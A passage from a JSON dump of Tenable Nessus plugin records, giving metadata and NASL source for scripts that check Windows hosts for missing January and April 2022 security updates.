"CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21912", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009543.NASL", "href": "https://www.tenable.com/plugins/nessus/156617", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156617);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21847\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21852\",\n \"CVE-2022-21857\",\n \"CVE-2022-21858\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21861\",\n \"CVE-2022-21862\",\n \"CVE-2022-21863\",\n \"CVE-2022-21864\",\n \"CVE-2022-21865\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21869\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21872\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21877\",\n \"CVE-2022-21878\",\n \"CVE-2022-21879\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21882\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21888\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21896\",\n \"CVE-2022-21897\",\n \"CVE-2022-21898\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21906\",\n \"CVE-2022-21907\",\n \"CVE-2022-21908\",\n \"CVE-2022-21910\",\n \"CVE-2022-21912\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21918\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21921\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009543\");\n script_xref(name:\"MSFT\", value:\"MS22-5009543\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0001\");\n\n script_name(english:\"KB5009543: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (January 2022) \");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009543.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21878, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21922, CVE-2022-21928, CVE-2022-21958,\n CVE-2022-21959, CVE-2022-21960, CVE-2022-21961,\n CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21880,\n CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21848, CVE-2022-21883, CVE-2022-21889,\n CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21857, CVE-2022-21859,\n CVE-2022-21860, CVE-2022-21862, CVE-2022-21863,\n CVE-2022-21864, CVE-2022-21866, CVE-2022-21867,\n CVE-2022-21868, CVE-2022-21870, CVE-2022-21871,\n CVE-2022-21873, CVE-2022-21875, CVE-2022-21879,\n CVE-2022-21881, CVE-2022-21884, CVE-2022-21885,\n CVE-2022-21895, CVE-2022-21897, CVE-2022-21901,\n CVE-2022-21902, CVE-2022-21903, CVE-2022-21908,\n CVE-2022-21910, CVE-2022-21914, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21920)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009543\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5009543.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21907\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009543');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19042',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009543]) \n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19043',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009543]) \n\n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19044',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009543]) \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:43:50", "description": "The remote Windows host is missing security update 5012632 or cumulative update 5012658. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26916, CVE-2022-26812,CVE-2022-26919,CVE-2022-26918,CVE-2022-26813, CVE-2022-26821,CVE-2022-26815,CVE-2022-26822,CVE-2022-26917, CVE-2022-26829,CVE-2022-26820,CVE-2022-26809,CVE-2022-26819, CVE-2022-24541,CVE-2022-24492,CVE-2022-24536,CVE-2022-24534, CVE-2022-24485,CVE-2022-26903,CVE-2022-24528,CVE-2022-21983, \tCVE-2022-24500)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-26797, CVE-2022-26796,CVE-2022-26904,CVE-2022-26798,CVE-2022-26801, CVE-2022-26802,CVE-2022-26810,CVE-2022-26792,CVE-2022-26794, CVE-2022-26790,CVE-2022-24544,CVE-2022-24540,CVE-2022-24481, CVE-2022-24527,CVE-2022-24474,CVE-2022-24521,CVE-2022-24499, CVE-2022-24494,CVE-2022-24542,CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26915, CVE-2022-26831)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24498)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012632: Windows Server 2008 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24485", "CVE-2022-24492", "CVE-2022-24494", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26815", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012632.NASL", "href": "https://www.tenable.com/plugins/nessus/159684", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159684);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24485\",\n \"CVE-2022-24492\",\n \"CVE-2022-24494\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26815\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012632\");\n script_xref(name:\"MSKB\", value:\"5012658\");\n script_xref(name:\"MSFT\", value:\"MS22-5012632\");\n script_xref(name:\"MSFT\", value:\"MS22-5012658\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012632: Windows Server 2008 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012632\nor cumulative update 5012658. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26916,\n CVE-2022-26812,CVE-2022-26919,CVE-2022-26918,CVE-2022-26813,\n CVE-2022-26821,CVE-2022-26815,CVE-2022-26822,CVE-2022-26917,\n CVE-2022-26829,CVE-2022-26820,CVE-2022-26809,CVE-2022-26819,\n CVE-2022-24541,CVE-2022-24492,CVE-2022-24536,CVE-2022-24534,\n CVE-2022-24485,CVE-2022-26903,CVE-2022-24528,CVE-2022-21983,\n\tCVE-2022-24500)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges. (CVE-2022-26797,\n CVE-2022-26796,CVE-2022-26904,CVE-2022-26798,CVE-2022-26801,\n CVE-2022-26802,CVE-2022-26810,CVE-2022-26792,CVE-2022-26794,\n CVE-2022-26790,CVE-2022-24544,CVE-2022-24540,CVE-2022-24481,\n CVE-2022-24527,CVE-2022-24474,CVE-2022-24521,CVE-2022-24499,\n CVE-2022-24494,CVE-2022-24542,CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26915,\n CVE-2022-26831)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24498)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012632\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012658\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012632 or Cumulative Update 5012658\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012658',\n '5012632'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0',\n sp:2,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012658, 5012632])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:43:50", "description": "The remote Windows host is missing security update 5012653. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-26798, CVE-2022-26801, CVE-2022-26786, CVE-2022-24549, CVE-2022-26794, CVE-2022-26802, CVE-2022-26792, CVE-2022-26797, CVE-2022-26787, CVE-2022-26803, CVE-2022-26796, CVE-2022-26790, CVE-2022-26904, CVE-2022-26808, CVE-2022-26788, CVE-2022-24544, CVE-2022-24540, CVE-2022-24486, CVE-2022-24481, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, CVE-2022-24547, CVE-2022-24499, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530, CVE-2022-26807)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26916, CVE-2022-26919, CVE-2022-26917, CVE-2022-26809, CVE-2022-26918, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-26903, CVE-2022-24528, CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24493, CVE-2022-24498, CVE-2022-24483)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831, CVE-2022-26915)", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012653: Windows 10 version 1507 LTS Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26831", "CVE-2022-26832", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012653.NASL", "href": "https://www.tenable.com/plugins/nessus/159680", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159680);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26831\",\n \"CVE-2022-26832\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012653\");\n script_xref(name:\"MSFT\", value:\"MS22-5012653\");\n script_xref(name:\"IAVA\", value:\"2022-A-0143-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012653: Windows 10 version 1507 LTS Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012653. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-26798, CVE-2022-26801, CVE-2022-26786, \n CVE-2022-24549, CVE-2022-26794, CVE-2022-26802, \n CVE-2022-26792, CVE-2022-26797, CVE-2022-26787, \n CVE-2022-26803, CVE-2022-26796, CVE-2022-26790, \n CVE-2022-26904, CVE-2022-26808, CVE-2022-26788, \n CVE-2022-24544, CVE-2022-24540, CVE-2022-24486, \n CVE-2022-24481, CVE-2022-24527, CVE-2022-24474, \n CVE-2022-24521, CVE-2022-24550, CVE-2022-24547, \n CVE-2022-24499, CVE-2022-24494, CVE-2022-24542, \n CVE-2022-24530, CVE-2022-26807)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26916, \n CVE-2022-26919, CVE-2022-26917, CVE-2022-26809, \n CVE-2022-26918, CVE-2022-24541, CVE-2022-24492, \n CVE-2022-24491, CVE-2022-24534, CVE-2022-24485, \n CVE-2022-24533, CVE-2022-26903, CVE-2022-24528, \n CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24493, CVE-2022-24498,\n CVE-2022-24483)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831,\n CVE-2022-26915)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012653\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012653\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012653'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', 